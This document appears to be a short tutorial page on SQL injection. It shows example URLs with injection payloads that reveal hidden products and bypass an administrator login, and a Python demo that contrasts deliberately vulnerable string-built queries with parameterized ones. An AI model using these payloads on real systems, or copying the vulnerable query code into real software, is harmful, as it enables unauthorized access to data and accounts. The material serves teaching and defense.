SECURITY

  minte9
REMEMBERS




Last update:   10-05-2022

Interfere

An attacker may interfere with the queries that an application makes to its database.

# Use a comment (--) to remove the remainder of the query

https://insecure-website.com/products?category=Gifts
# SELECT * FROM products WHERE category = 'Gifts' AND released = 1

https://insecure-website.com/products?category=Gifts'--
# SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

https://insecure-website.com/products?category=Gifts'+OR+1=1--
# SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1

Bypass

An attacker can log in as any user without a password.
 
# SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
# SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
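
The two cases above, run against an in-memory SQLite database as an added example (not code from the original page): the string-built queries return the unreleased row and the administrator account, while the same inputs bound as parameters match nothing. Table contents, function names and the administrator password are constructed for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        INSERT INTO products VALUES ('Mug', 'Gifts', 1),
                                    ('Prototype', 'Gifts', 0),
                                    ('Lamp', 'Home', 1);
        -- Plaintext passwords only mirror the page's query; values are constructed.
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('wiener', 'bluecheese'),
                                 ('administrator', 'constructed-secret');
    """)
    return db

def products_concat(db, category):
    # Vulnerable: the parameter becomes part of the SQL text.
    sql = ("SELECT name FROM products WHERE category = '" + category +
           "' AND released = 1")
    return sorted(row[0] for row in db.execute(sql))

def products_bound(db, category):
    # Hardened: the parameter is bound as data, so ' and -- have no SQL meaning.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return sorted(row[0] for row in db.execute(sql, (category,)))

def login_concat(db, username, password):
    # Vulnerable: same string building, applied to the login check.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_bound(db, username, password):
    # Hardened: both values are bound, the password test is always evaluated.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(repr(value), products_concat(db, value), products_bound(db, value))
    print(login_concat(db, "administrator'--", ""),
          login_bound(db, "administrator'--", ""))
```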
